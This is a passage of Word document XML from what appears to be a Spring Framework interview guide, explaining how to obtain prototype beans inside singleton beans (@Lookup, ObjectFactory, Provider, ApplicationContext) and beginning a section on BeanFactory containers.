      <w:bookmarkEnd w:id="439"/>
    </w:p>
    <w:p w14:paraId="57EFCFDB" w14:textId="31838A4E" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In Spring, when you have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bean that needs to call a </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>prototype</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bean, you cannot directly inject a prototype bean into a singleton bean using constructor or field injection. This is because Spring's </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singleton scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means the bean is created once and held in the container for the entire application context lifecycle, whereas a </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>prototype bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is created each time it is requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2605F241"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To manage this, you have a few options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2B7E74" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21"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1. Using @Lookup Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F15FD"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The @Lookup annotation is a Spring feature that allows you to dynamically look up a prototype bean within a singleton bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B4954" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D8DAC1"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614D03A4"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public class SingletonBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62918936" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0449C645"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ookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47FCE4"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ublic PrototypeBean getPrototypeBean() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD76AA"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 Spring will override this method to return a new instance of PrototypeBean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E4EAC"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return null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409CDA27"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5C69D073" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="626EB427"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ublic void performAction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0216FB"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rototypeBean prototypeBean = getPrototypeBean();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07387AB9"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rototypeBean.doSomething();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC8AF06"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59EF4C46"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4E0421" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680132A3"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11009074"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Scope("prototype")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB26192"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public class PrototypeBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F55F70E"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ublic void doSomething() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3A5D5"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System.out.println("Prototype bean is doing something");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012DBCBE"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52AE68C3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F5F356" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1869"/>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Here, @Lookup allows Spring to inject a new instance of the PrototypeBean every time the method getPrototypeBean() is called, even though SingletonBean is a singleton.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0184D7CD" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21"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2. Using ObjectFactory or Provider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605797BB"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Another option is to use Spring's ObjectFactory or Provider to lazily retrieve a prototype bean inside a singleton bean. This approach works because ObjectFactory and Provider provide a way to get a fresh instance of a prototype bean every time it is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B64CCFC" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21"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Using ObjectFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05189BA5"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C17AFFB"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public class SingletonBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6FC03" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BED20A"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C8009"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rivate ObjectFactory&lt;PrototypeBean&gt; prototypeBeanFactory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1887CD" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171E9599"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ublic void performAction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5DC50F"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rototypeBean prototypeBean = prototypeBeanFactory.getObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D85F3"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rototypeBean.doSomething();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E88947"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78E74600"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B756CB4" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D81539"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B311C2"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Scope("prototype")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBD2873"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public class PrototypeBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C5B00C"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ublic void doSomething() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFFA842"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System.out.println("Prototype bean is doing something");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE6B508"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26BBD192"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E638377" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21"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Using Provider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB73344"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import javax.inject.Provider;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013672AD" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20DA0874"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6783070E"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public class SingletonBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B2A347" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682EAE43"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E02784"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rivate Provider&lt;PrototypeBean&gt; prototypeBeanProvider;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58D15C" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D64B188"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ublic void performAction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFB72AA"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rototypeBean prototypeBean = prototypeBeanProvider.get();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6ACFCD"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rototypeBean.doSomething();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB2E8D4"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299AE283"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F078BB" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6554802A"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C5AA1D"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Scope("prototype")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C1917"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public class PrototypeBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB5941"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ublic void doSomething() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BDA8C"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System.out.println("Prototype bean is doing something");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1BEEB8"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10A1FC16"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3150998E" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1870"/>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lastRenderedPageBreak/>
        <w:t>Both ObjectFactory and Provider allow for the lazy retrieval of the prototype bean. The getObject() method (or get() in case of Provider) will return a new instance of the prototype bean whenever needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1FB3F3" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21"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3. Using ApplicationContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67476989"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You can also retrieve the prototype bean from the ApplicationContext using the getBean method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A89B24"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14547CE9"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public class SingletonBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0848BF67" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E39434"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB97B29"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rivate ApplicationContext context;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B6BFCB" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E897CD"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ublic void performAction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37147122"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rototypeBean prototypeBean = context.getBean(PrototypeBean.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26450124"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rototypeBean.doSomething();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4049891C"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601DD881"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7407A4D4" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="644B3C4B"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554FD03"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Scope("prototype")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B27EC"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public class PrototypeBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B73551"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ublic void doSomething() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A854130"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System.out.println("Prototype bean is doing something");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4522A355"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5CE0C600"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3618CAD6" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1871"/>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In this case, ApplicationContext.getBean() can be used to obtain a new instance of the prototype bean each time performAction() is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A4F9A" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21"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Summary of Approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223CBB50" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1872"/>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Lookup Annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows dynamic resolution of prototype beans within singleton beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEAA2FD" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1872"/>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ObjectFactory or Provider</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a more flexible and programmatic way to retrieve prototype beans in a lazy, on-demand manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7B7CDB" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1872"/>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ApplicationContext.getBean()</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Directly retrieves prototype beans using the ApplicationContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E71B932" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21"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Each of these approaches ensures that a new instance of the prototype bean is created every time it's needed by the singleton bean, maintaining the intended behavior for prototype-scoped beans within singleton-scoped classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA46E49" w14:textId="58889DF5" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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1F89569">
          <v:rect id="_x0000_i2109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F48E7A2" w14:textId="3714B556" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="0072390F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="440" w:name="_Toc196307920"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are containers present in the spring</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="440"/>
    </w:p>
    <w:p w14:paraId="3D770788" w14:textId="5A88565E" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In Spring, </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are responsible for managing the lifecycle of beans and the overall configuration of the application. The Spring container provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism, allowing objects to be created, wired, and managed with minimal configuration. There are two main types of containers in the Spring Framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A68B9F6" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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1. BeanFactory Container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB2C5C5" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1873"/>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BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the simplest container in Spring. It is the base interface for the Spring container and is used to manage beans in a very basic form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B59E145" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1873"/>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Lazy Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Beans in the BeanFactory container are lazily loaded, meaning they are created only when they are first requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223F193" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1873"/>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Basic Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is suitable for small applications or scenarios where performance optimization is crucial since it delays bean creation until it’s actually needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7889D" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E40E4C0" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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t;bean id="exampleBean" class="com.example.ExampleClass" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A945AF0" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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BeanFactory can be used like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68718413" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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BeanFactory factory = new XmlBeanFactory(new ClassPathResource("beans.xml"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4B367" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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ExampleClass example = (ExampleClass) factory.getBean("exampleBean");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C362D8" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Note</w:t>
